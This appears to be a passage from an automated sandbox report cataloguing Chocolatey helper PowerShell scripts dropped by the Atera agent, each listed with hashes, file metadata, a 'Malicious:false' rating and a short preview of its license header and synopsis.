                                                                                                                                                                                                                                                                                              SHA1:0B84BACF023719AAF1F52544FDA4B1542E3FBD5D
                                                                                                                                                                                                                                                                                              SHA-256:2F11852DCC6C4C45BAA7355A5ABA501846A96DA75B0332A5347D382D876F94C8
                                                                                                                                                                                                                                                                                              SHA-512:D9B1E7457B71F0DD930C7DD10076FCCB75E2F6AE6E7129FC417F629DE63C34B8448D7F52D733B476BBAC39C2A758444F462CA8839987C6E3C178C592F6212EEB
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-UninstallRegistryKey {..<#...SYNOPSIS..Retrieve registry key(s) for system-installed applications from an..exact or wildcard search......DESCRIPTION..This function will attempt to retrieve a matching registry key for an..already installed application, usually to be used with a..chocolateyUninstall.ps1 automatio
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1815
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.188333753523367
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:cSy93R2O+4Ipg8AQyU0E+SlHQk1GpsLA9NIrd+aL85TiV+hT0hCmTxGz1echWtLt:cSyL+4pe90AlH31KoMCoaYp4AmVMMth
                                                                                                                                                                                                                                                                                              MD5:FE5456E477F7D5131DD448942A3AD961
                                                                                                                                                                                                                                                                                              SHA1:C8FDE141D6D5E6713A13C2A6DF55A07E2BB187E5
                                                                                                                                                                                                                                                                                              SHA-256:88D9BA7C04A62D34EDB6A913CE00463FBDC82A2986AC9F459E04B75BC1728922
                                                                                                                                                                                                                                                                                              SHA-512:261AA5F14F8A98638869A509844ECDEE1286B97B131D89A3B901AC2B40F09066CBC1C073D32DDE3EA160FB2C2F971BA0D6785981C6C180BEC5DC4F0D6029421E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-VirusCheckValid {..<#...SYNOPSIS..Used in Pro/Business editions. Runtime virus check against downloaded..resources......DESCRIPTION..Run a runtime malware check against downloade
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):12827
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.065872919066253
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:eBbyvHpL71ZxDlVWfYuuiy5nevc/n30zrryM3zE2LoQY+VUqZA:eBgptZxOQt10zrryMFLdYWU6A
                                                                                                                                                                                                                                                                                              MD5:76013037F6A0E623C39D9D07C20D3BAE
                                                                                                                                                                                                                                                                                              SHA1:7DC87082B4D2AB36AB08D6826CA209E2CD7C5694
                                                                                                                                                                                                                                                                                              SHA-256:8FCCA5AA5F0F631FBE9D319EB13C5A282F5DBC1D8D4BC0852021BE0524A6DD39
                                                                                                                                                                                                                                                                                              SHA-512:9D92B42EEBEE276522103D23EF646DFEC32630E97673B816F51841948C6DD9DA89A89B897D515CFFECED7D14174EF83110FFA4B0BA9F64E1738F083592E696F0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# http://poshcode.org/417..## Get-WebFile (aka wget for PowerShell)..##############################################################################################################..## Downloads a file or page from the web..## History:..## v3.6 - Add -Passthru switch to output TEXT files..## v3.5 - Add -Quiet switch to turn off the progress reports .....## v3.4 - Add progress report for files which don't report size..## v3.3 - Add progress report for files which report their size..## v3.2 - Use the pure Stream object because StreamWriter is based on TextWriter:..## it was messing up binary files, and making mistakes with extended characters in text..## v3.1 - Unwrap the filename when it has quotes around it..## v3 - rewritten completely using HttpWebRequest + HttpWebResponse to figure out the file name, if possible..## v2 - adds a ton of parsing to make the output pretty..## added measuring the scripts involved in the command, (uses Tokenizer)..#####################
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9247
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.07010917787166
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:cSypQGXHQybOdQVeBAmZZ8mumtrUy5nF2wnK0u/obu5OyDucYhr:ctpQG3G1vPS0uQZ2uH
                                                                                                                                                                                                                                                                                              MD5:CCEF9317BA6E4AD2C5F9ADA169DE64E3
                                                                                                                                                                                                                                                                                              SHA1:0B03F562CC75CDFB7CC184DA8B8E6BA73A6256A7
                                                                                                                                                                                                                                                                                              SHA-256:1D10AEC25CE4A010B338041862F485BDA47494A3A0EE154BBA49F48BCFCF0D68
                                                                                                                                                                                                                                                                                              SHA-512:922BCEFDCC76A32EE81AB0610BA1E256A228075084DE5A85F11D3B67D62F496A86BD59BE3AA5E00EC24E5A2805AD4199D5D38CD05D92D1BBC43F333FBE924D30
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License...#..# Based on http://stackoverflow.com/a/13571471/18475....function Get-WebFileName {..<#...SYNOPSIS..Gets the original file name from a url. Used by Get-WebFile to determine..the original file name for a file......DESCRIPTION..Uses several techniques to determine the original file name of the file..based on the url for the fi
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):5960
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.140316008573171
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKovnYWHVjmlvr79s5nFUFwlmiZn28HeheXeGYDXSqVR2vRtktvS:cSyL+QGXH2QVqlvr7y5nFDXnw0ud3Q
                                                                                                                                                                                                                                                                                              MD5:510D813D8B844FA9ABCF1CF8B294CE83
                                                                                                                                                                                                                                                                                              SHA1:B733C7BC5B1EA00C27895DE8BFB337183D9335E1
                                                                                                                                                                                                                                                                                              SHA-256:58C4E3DE6F018A33E4952AF35EFCCC0B688F1170F733CC10E2C32A33F11A9123
                                                                                                                                                                                                                                                                                              SHA-512:3D3DA339A6B9CAC75CB940B573703BBA5782D22918637D4399636F0F2787436920D6965F2165E294C68107905D556F115CD8416C97A18B12B7F0207CD7721AAC
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Get-WebHeaders {..<#...SYNOPSIS..Gets the request/response headers for a url......DESCRIPTION..This is a low-level function that is used by Chocolatey to get the..headers for a reque
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):6283
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.232086061865062
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:cSyL+QGXHN0Vk7arlCnBVV+7oc9KYjWndTmw:ctL+QG05rlwguh
                                                                                                                                                                                                                                                                                              MD5:5617A2B6826D73A80E864B42A3404E72
                                                                                                                                                                                                                                                                                              SHA1:61522560BF997DD79C6649F0C1D198510E19430F
                                                                                                                                                                                                                                                                                              SHA-256:9FC392C4558C2579517F24D945D8E1741EB4A5D7893E4E2DCA6CA756443AB328
                                                                                                                                                                                                                                                                                              SHA-512:B4EA54386B427AC314854AE3584EBF7AEB9E178026346917B05249A28CF831FBD7F87D12CCF56F00DA9C4F55ABC7324E69C4AB9B367258AC2F35960BAFEFADF3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-BinFile {..<#...SYNOPSIS..Creates a shim (or batch redirect) for a file that is on the PATH......DESCRIPTION..Chocolatey installs have the folder `$($env:ChocolateyInstall)\b
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4293
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.147557599553147
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKooCb/InyxVkR8PIoIxAETBXSYG:cSyL+QGXHeCjIGVo8qXSYG
                                                                                                                                                                                                                                                                                              MD5:06FC3CDC03EC16E85CE73D558D58742B
                                                                                                                                                                                                                                                                                              SHA1:C73F95322D853B964AD241CD9B1EFD1A6AF8B101
                                                                                                                                                                                                                                                                                              SHA-256:E6E24F83FDA53709F7EA93F73533314156F1DA0B028FC7BD063BA1720D1A6ADA
                                                                                                                                                                                                                                                                                              SHA-512:A1BB72C33CC1544432B6E4A3317843331ECB70D954DBFC195A3A6AD3FDF18280F807BF2A9DEC06D036111A46062EE04A87C2D315F4E895D2C7F2DAAF6B4CB48A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyEnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-VariableType 'Machine'.`....Creates a persistent environment variable......DES
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4549
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.216765809932499
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKobx0W2Pq44GGVq/r6ck8Tr6ck012gMe5RDJRmR0GRSd:cSyL+QGXHBx03x4rVqDQ8vQubL5HItUd
                                                                                                                                                                                                                                                                                              MD5:D283FDF0627E77F4745CE26CBB134DDB
                                                                                                                                                                                                                                                                                              SHA1:D41419D3F8DC3F22B37E5CDE1090CF19879F8466
                                                                                                                                                                                                                                                                                              SHA-256:C4292F8767BD7E74E85C4AABCDB9EB0ED3B564693AAC1F568EB02FF7529DF027
                                                                                                                                                                                                                                                                                              SHA-512:A14822AEC4351C106325F1403F79DF444CB53C03CB09AE0FF15169CEC821102A11186B321F9FE8CEFC35932FE02A874E984EECADDA3EC5DCA52AB7EDEE9DB1F4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyExplorerMenuItem {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Creates a windows explorer context menu item that can be associated with..a command.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3080
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.192518177403395
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:cSyL+4pGXHFKoognbqHdyVO6ckUf1eg9DgH:cSyL+QGXHqgnydyVOQUf1eg9DgH
                                                                                                                                                                                                                                                                                              MD5:44D634D52E391B61FEA2B3311FD130C4
                                                                                                                                                                                                                                                                                              SHA1:AC5184FA6552AD3D2D58EBD53563ED3238E089FF
                                                                                                                                                                                                                                                                                              SHA-256:22FA3870EC2455426BD2BA94B5DC82C241D16F1DBD1AC6979787E947B39563AE
                                                                                                                                                                                                                                                                                              SHA-512:53F5C0D5865DA75816B663CDD4279938401498416A2AD4FD4A7667CC93042D4FBCBC7B2F2F1FD3864CFADBC73908730C6EC7761A77207511861CB277AF8DBF59
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyFileAssociation {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Creates an association between a file extension and a executable......DESCRIPTION..In
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):14313
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.166123502608628
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:ctL+QGm9UIirNuMyrnyBOXOrH2ZoBZiLtM+h1yBPSa:ctL+yG9PKQaOyaBEl1+PSa
                                                                                                                                                                                                                                                                                              MD5:7BB19403672F88442C8510579DEEA62B
                                                                                                                                                                                                                                                                                              SHA1:D7685A3C16C53822D696EE3479451BCF1C42860A
                                                                                                                                                                                                                                                                                              SHA-256:FDAE94594F6DDF60874760BC0E8306422681CE7C177BFA811A625AE74363CCAF
                                                                                                                                                                                                                                                                                              SHA-512:8383D42946F02B72676BF3F6016C0CFA9355AE840320354111B8E40CD9567F46B558B4B60809BF6F0B1364A1F84E6815DC04B02D2F42078E0057F1990CCC83A3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyInstallPackage {.. <#...SYNOPSIS..**NOTE:** Administrative Access Required.....Installs software into "Programs and Features". Use..Install-ChocolateyPackage when
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):17164
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.102467977763193
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:ctL+QG/i9AUaHrN+eNbVPoC8XdI96LMw9lpWo:ctL+jiKUW+eNbVPHMG9Gz
                                                                                                                                                                                                                                                                                              MD5:EF3DA9AA21D97701F975F6E7EC05790D
                                                                                                                                                                                                                                                                                              SHA1:C78F165791049FA3A17218AE2ADEECF79C628E15
                                                                                                                                                                                                                                                                                              SHA-256:917FCEC8CA28B0EF404F565AAECF7FB850E193326D012583927CAA8BB55FB3EC
                                                                                                                                                                                                                                                                                              SHA-512:40C18493196A1395EB72629042E0BE98F19CF657E402FF0F21447A238879157534BBCA632C40B047B42C4EA46C9935D40EF53604DCADB5552B8F6D4A5027C809
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPackage {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Installs software into "Programs and Features" based on a remote file..download. Use Install-
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4341
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.172978110813656
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPath {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-PathType 'Machine'.`....This puts a directory to the PATH environment variable......DESCRIPTI
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2645
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.278706654776255
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPinnedTaskBarItem {..<#...SYNOPSIS..Creates an item in the task bar linking to the provided path......NOTES..Does not work with SYSTEM, but does not error. It warns
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9319
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.106965440646972
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPowershellCommand {..<#...SYNOPSIS..Installs a PowerShell Script as a command.....DESCRIPTION..This will install a PowerShell script as a command on your system. Li
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):7888
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.219559860002251
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyShortcut {..<#...SYNOPSIS..Creates a shortcut.....DESCRIPTION..This adds a shortcut, at the specified location, with the option to specify..a number of additional p
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):8855
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.1654657712280985
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyVsixPackage {..<#...SYNOPSIS..Downloads and installs a VSIX package for Visual Studio.....DESCRIPTION..VSIX packages are Extensions for the Visual Studio IDE. The V
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
